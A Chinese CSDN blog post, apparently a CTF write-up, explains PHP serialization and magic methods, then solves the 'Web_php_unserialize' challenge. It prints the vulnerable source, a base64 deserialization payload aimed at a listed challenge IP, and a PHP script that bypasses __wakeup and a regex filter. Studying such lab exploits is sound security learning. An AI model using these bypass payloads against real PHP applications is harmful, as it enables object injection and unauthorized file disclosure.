PHP反序列化

最新推荐文章于 2022-10-08 11:24:42 发布
最新推荐文章于 2022-10-08 11:24:42 发布
阅读量139 收藏
点赞数
分类专栏: ctf 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35599248/article/details/119049128
版权

什么是序列化?

内容进行流化,流的概念这里不用多说(就是I/O)。我们可以对流化后的对象进行读写操作,也可将流化后的对象传输于网络之间在对对象流进行读写操作时会引发一些问题,而序列化机制正是用来解决这些问题的!
注:要想将对象传输于网络必须进行流化!

我对序列化的理解

序列化是将变量进行加工后变成字符串便于传输和持久保存,它常用于对象的处理,对象和序列化是两种不同的状态,可以通过serialize()和unserialize()互相转化。
对象序列化后的格式:
O:对象名长度:“对象名”:数据成员个数:{数据成员}
eg:O:11:“SampleClass”:1:{s:5:“value”;r:1;}

PHP中常见魔法函数

__construct():创建对象时初始化
__destruction():结束时销毁对象
__toString():对象被当作字符串时使用
__sleep():序列化对象之前调用
__wakeup():反序列化之前调用
__call():调用对象不存在时使用
__get():调用私有属性时使用
在调用序列化函数serialize()时先会检查是否存在__sleep()函数,它可以控制序列化的内容。
在调用unserialize()是会先检查是否存在__wakeup()函数,它可以控制反序列化的内容。

PHP反序列化漏洞

利用条件
unserialize()函数的参数可控
有可利用的其他魔法函数。

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

通过代码审计,首先看到flag在fl4g.php里面,就需要执行highlight_file(fl4g.php),然后还要绕过__wakeup(),就是让成员属性数目大于实际数目,然后要执行unserialize()函数,还要绕过preg_match(),可以它过滤的是(o/c/O/C):(多个数字):所以绕过的技巧技巧就是在数字前加一个+号,不改变其意义。
所以最后的payload:

http://111.200.241.244:55956/var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

下面附上脚本

<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$a = new Demo("fl4g.php");
$str=serialize($a);
echo $str.'<br>';
$str=str_replace("O:4:","O:+4:",$str);
$str=str_replace(":1:",":2:",$str);
echo base64_encode($str);
?>

在这里插入图片描述

反思与总结

1、正则表达式的绕过
我最开始以为这个正则绕过会比较难,百度了一下有什么换行绕过,截断绕过,异或绕过。。。。。,结果后来才发现原来是我正则没看懂,呜呜呜,准备后面花时间系统学一下正则表达式。
2、序列化后的Demofile长度为什么是10,而不是8
这个让我纠结了好久,最后才注意到是数据成员的权限不同,为了区别不同权限的数据成员,使用了不同的标识符。

  • public无标记,变量名不变,长度不变 eg:s:2:“op”;i:2;
  • protected在变量名前添加标记%00*%00,长度+3 eg:s:5:"%00*%00op";i:2;
  • private在变量名前添加标记%00(classname)%00,长度+2 eg:s:17:"%00FileHandler_Z%00op";i:2;
Sn@IL
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-Web_php_unserialize
qq_53755216的博客
04-01 126
题目 废话没多说 上来就是一段代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function
【XCTF 攻防世界】WEB 高手进阶区 Web_php_unserialize
weixin_45844670的博客
08-22 399
题目是一段php代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wake
攻防世界Web_php_unserialize
qq_51283187的博客
08-01 170
攻防世界Web_php_unserialize 这个是序列化的一个很经典的题目 这是网站源代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this
PHP序列化和反序列化漏洞
CyhDl666的博客
01-30 636
文章目录序列化序列化数组序列化对象反序列化序列化漏洞+实例_wakeup()漏洞的绕过攻防世界:unserialize3攻防世界:Web_php_unserialize函数同名方法利用session利用 序列化 序列化数组 serialize()函数可以序列化对象和数组返回一个字符串 序列化数组 <?php $sites = array('Google', 'Runoob', 'Facebook'); $serialized_data = serialize($sites); echo $ser
攻防世界 WEB WEB_PHP_UNSERIALIZE
qq_41696858的博客
08-16 136
首先需要讲明的一件事是,PHP序列化的时候对public protected private变量的处理方式是不同的 具体看这篇文章,https://blog.csdn.net/Xxy605/article/details/117336343,注意,这里的\00表示是不可见字符,并不是单纯的\00,相当于url里面的%00所以需要自己写代码 让编译器帮我们做序列化 这题源码没什么难度 <?php class Demo { private $file = 'index.php'; pu
详解php反序列化
12-17
PHP反序列化是一种将之前通过序列化保存的字符串还原成原始数据结构的技术。在PHP中,`serialize()`函数用于将变量转化为可存储或传输的字符串形式,而`unserialize()`函数则相反,它将字符串还原为原来的变量。这两...
php反序列化例题.docx
最新发布
07-18
PHP 反序列化详解 PHP 反序列化是指将序列化的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列化和反序列化的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 反序列化的过程...
浅析PHP反序列化中过滤函数使用不当导致的对象注入问题
12-20
总之,PHP反序列化过程中的对象注入问题主要源于过滤函数处理不当导致的字符串长度变化。开发者在编写代码时应谨慎处理用户输入,并确保过滤和反序列化操作的安全性。正确使用过滤函数,避免在过滤后改变原始序列化...
PHP常见的序列化与反序列化操作实例分析
10-16
PHP编程中,序列化和反序列化是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...
CTF笔记 攻防世界Web_php_unserialize
qq_51248658的博客
10-08 318
做过几次反序列化题目,但都是看wp写出来的,也没有记住,所以记一下笔记。小白理解,有不对的地方,还请大佬们指出。通过代码审计进行利用反序列化漏洞(遇到不懂函数要自己去查),然后需要自己进行实例化得到序列化结果,需要多练。
攻防世界 Web_php_unserialize 反序列化
trytowritecode的博客
10-24 355
昨天帮忙打了场比赛,web题目里也是有反序列化的题,也是利用魔术方法的调用来构造pop链,获取flag但那道题好绕我不会写,然后还有关于json的题,就发现自己好多都没学,真的打一场比赛容易把自己人都打傻掉。 这道题也是看了好久才明白的题目。 废话不多直接上代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file =
记云演PHP代码审计第一关
weixin_45869407的博客
09-25 211
学习最好的方法就是记录,所以本次记录为了以后自己复习使用。 第一关代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file,
CTF题目记录3(二次编码,反序列化
kkzzjx
05-15 1812
miniL被虐了QAQ太菜惹555 有精通php反序列化的旁友可以暗搓搓交换下思路 PHP2 (攻防世界) Can you anthenticate to this website? 其他什么都没有 index.phps源码泄露(记在小本本上,Phps是php的源码) 好脑洞 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_G
攻防世界_WEB:Web_php_unserialize
qq_46110224的博客
08-15 266
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() {
PHP反序列化分析
JBlock的博客
04-06 1048
文章目录简介:PHP序列化格式SERIALIZE流程小结UNSERIALIZE流程小结PHP反序列化漏洞CTF题目分析代码分析姿势一姿势二姿势三利用 phar 拓展 php 反序列化漏洞攻击面 简介: 简单的理解:序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化是序列化的逆过程。 序列化的对象可...
php 反序列化 && 常见的利用
3569
06-20 3054
http://www.lmxspace.com/2018/05/03/php-unserialize-%E5%88%9D%E8%AF%86/第一章 写在开头在OWASP TOP10中,反序列化已经榜上有名,但是究竟什么是反序列化,我觉得应该进下心来好好思考下。我觉得学习的时候,所有的问题都应该问3个问题:what、why、how。what:什么是反序列化,why:为什么会出现反序列化漏洞,how:...
[wp] 攻防世界 baby_web
MercyLin的博客
09-27 9921
emmm,这就是个签到题 这里提一下两种做法,第一种是直接抓包 第二种是
1st XTUCTF部分Writeup
Essen's
06-18 1057
1st XTUCTF   这次算是第一次在有限时间内完成ctf线上题,虽说题目很友好,但还是TCL,所以仅仅写出了misc题和一道web题,pwn和逆向题实在是不懂唉。 Misc 1.签到 下载附件并打开,里面是一张数独题目和题目描述(描述同图)签到题应该不设卡,说啥就是啥吧。           数独求解器解数独并按照要求输入,转为32大写md5值,得flag flag{9100E30EF4F...
php反序列化
05-24
PHP反序列化是指将序列化的数据还原为对象或数组的过程。在PHP中,我们可以使用序列化和反序列化来实现对象的持久化,即将对象保存到文件或数据库中,并在需要时还原为对象。反序列化可以通过unserialize()函数来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值